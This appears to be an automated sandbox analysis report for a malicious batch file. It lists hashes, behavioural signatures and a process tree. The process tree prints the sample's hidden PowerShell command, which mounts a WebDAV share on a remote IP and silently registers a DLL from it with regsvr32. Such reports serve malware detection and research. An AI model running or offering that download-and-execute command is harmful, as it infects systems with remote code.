Analysis
-
max time kernel
117s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
19/07/2024, 03:25
Static task
static1
Behavioral task
behavioral1
Sample
462bab7323a73643e7e932dda4e3304cc222aa1dcb8bfa9b8a9902cd54226c56.bat
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
462bab7323a73643e7e932dda4e3304cc222aa1dcb8bfa9b8a9902cd54226c56.bat
Resource
win10v2004-20240709-en
General
-
Target
462bab7323a73643e7e932dda4e3304cc222aa1dcb8bfa9b8a9902cd54226c56.bat
-
Size
5KB
-
MD5
adddd4eb0b435b315bf4fe4eb51a10bc
-
SHA1
b4176175f7fce2912ad148d32d6a2319cc318ed6
-
SHA256
462bab7323a73643e7e932dda4e3304cc222aa1dcb8bfa9b8a9902cd54226c56
-
SHA512
cabe52a6fef9c7b03b880357c90912b3c8f46d699cefa83ddeddb985db92ad2596582ba63f8411659faaf688fc1c2e3b9e2d35c2ba890b4552b2dbb8b38cf07a
-
SSDEEP
96:hizFqBWVs2T7dx3W0ANEz1b2iSXae160sUIKRrzzMZERrzzMy+1IQehPBiq8DEyX:IzFz+2T7W/I1/Eae160sU99zzyE9zzOz
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2732 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2732 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2732 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 3048 wordpad.exe 3048 wordpad.exe 3048 wordpad.exe 3048 wordpad.exe 3048 wordpad.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 3016 wrote to memory of 3048 3016 cmd.exe 31 PID 3016 wrote to memory of 3048 3016 cmd.exe 31 PID 3016 wrote to memory of 3048 3016 cmd.exe 31 PID 3016 wrote to memory of 2732 3016 cmd.exe 32 PID 3016 wrote to memory of 2732 3016 cmd.exe 32 PID 3016 wrote to memory of 2732 3016 cmd.exe 32 PID 2732 wrote to memory of 2884 2732 powershell.exe 34 PID 2732 wrote to memory of 2884 2732 powershell.exe 34 PID 2732 wrote to memory of 2884 2732 powershell.exe 34 PID 2732 wrote to memory of 2652 2732 powershell.exe 35 PID 2732 wrote to memory of 2652 2732 powershell.exe 35 PID 2732 wrote to memory of 2652 2732 powershell.exe 35 PID 2732 wrote to memory of 2652 2732 powershell.exe 35 PID 2732 wrote to memory of 2652 2732 powershell.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\462bab7323a73643e7e932dda4e3304cc222aa1dcb8bfa9b8a9902cd54226c56.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:3048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\297991671131869.dll2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\3⤵PID:2884
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\297991671131869.dll3⤵PID:2652
-
-